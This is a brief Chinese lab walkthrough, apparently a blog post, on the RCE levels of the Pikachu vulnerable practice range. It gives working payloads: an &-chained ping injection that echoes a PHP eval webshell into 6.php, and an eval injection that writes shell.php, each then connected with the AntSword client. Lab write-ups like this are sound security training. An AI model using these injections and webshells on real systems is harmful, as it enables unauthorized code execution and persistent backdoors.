Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
HalvmånEver1 分钟前
Linux:信号保存下(信号二)
linux·运维·服务器·c++·学习·信号
Qiuner1 分钟前
软件工程计算机网络WindowService2008 DNS DHCP网络策略和访问策略IIS 相关配置 期末考试实操题操作题windows运维
运维·网络·windows·计算机网络
安科瑞刘鸿鹏172 分钟前
电量和碳量如何建立关系?企业能碳管理的关键一步
运维·网络·物联网·安全
小李独爱秋2 分钟前
计算机网络经典问题透视:试述资源预留协议RSVP的工作原理?
运维·服务器·网络·网络协议·计算机网络·rsvp
2501_941982052 分钟前
企微API外部群自动化:快速建立自己的护城河
运维·自动化·企业微信
卿着飞翔5 分钟前
win11安装配置nginx并部署ruoyi前端
运维·前端·nginx
习惯就好zz8 分钟前
解决VMware Ubuntu端口映射SSH连接失败问题:无需重启服务器的快速修复方案
服务器·windows·ubuntu·ssh·vmware
咕噜企业分发小米10 分钟前
有哪些游戏服务器框架适合新手使用?
运维·服务器·游戏
沛沛rh4511 分钟前
Rust入门一:从内存安全到高性能编程
开发语言·安全·rust
康康的AI博客11 分钟前
从模型到生产:AI大模型落地工程实战指南
服务器·人工智能·ai
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)03在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05UV安装并设置国内源06Linux下V2Ray安装配置指南07AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南08BongoCat - 跨平台键盘猫动画工具09Claude Code Skills 实用使用手册102025 Telegram 最新免费社工库机器人(LetsTG可[特殊字符])搭建指南(含 Python 脚本)